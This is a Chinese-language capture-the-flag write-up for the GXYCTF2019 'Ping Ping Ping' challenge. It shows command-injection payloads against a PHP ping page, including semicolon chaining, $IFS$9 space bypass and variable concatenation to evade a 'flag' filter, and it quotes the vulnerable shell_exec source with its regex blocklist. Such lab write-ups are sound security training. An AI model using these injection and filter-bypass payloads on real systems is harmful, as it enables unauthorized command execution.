[GXYCTF2019]Ping Ping Ping
作者:互联网
[GXYCTF2019]Ping Ping Ping
进入环境输个ip发现就是在ping这个ip地址,我们尝试使用分号来执行命令
发现flag.php可惜不能直接cat flag.php估计绊掉了,那我们cat index.php看看还是不行,尝试绕过了一下空格,原来空格也过滤了,这样一来源码就出来了
?ip=127.0.0.1;cat$IFS$9index.php
源码如下
/?ip=
|\'|\"|\\|\(|\)|\[|\]|\{|\}/", $ip, $match)){
echo preg_match("/\&|\/|\?|\*|\<|[\x{00}-\x{20}]|\>|\'|\"|\\|\(|\)|\[|\]|\{|\}/", $ip, $match);
die("fxck your symbol!");
} else if(preg_match("/ /", $ip)){
die("fxck your space!");
} else if(preg_match("/bash/", $ip)){
die("fxck your bash!");
} else if(preg_match("/.*f.*l.*a.*g.*/", $ip)){
die("fxck your flag!");
}
$a = shell_exec("ping -c 4 ".$ip);
echo "
";
print_r($a);
}
?>
过滤了很多东西但是发现了一种方法可以绕过
?ip=127.0.0.1;a=ag;b=fl;cat$IFS$9$b$a.php
我们通过;来拼接执行执行代码,通过$IFS$9绕过空格限制,然后拼接指令即可,但这里过滤了flag,要绕过正则匹配必须fl写在后面的哪个变量中
查看源码即可发现flag
标签:ip,Ping,flag,fxck,php,GXYCTF2019,match 来源: https://blog.csdn.net/weixin_52268949/article/details/122812761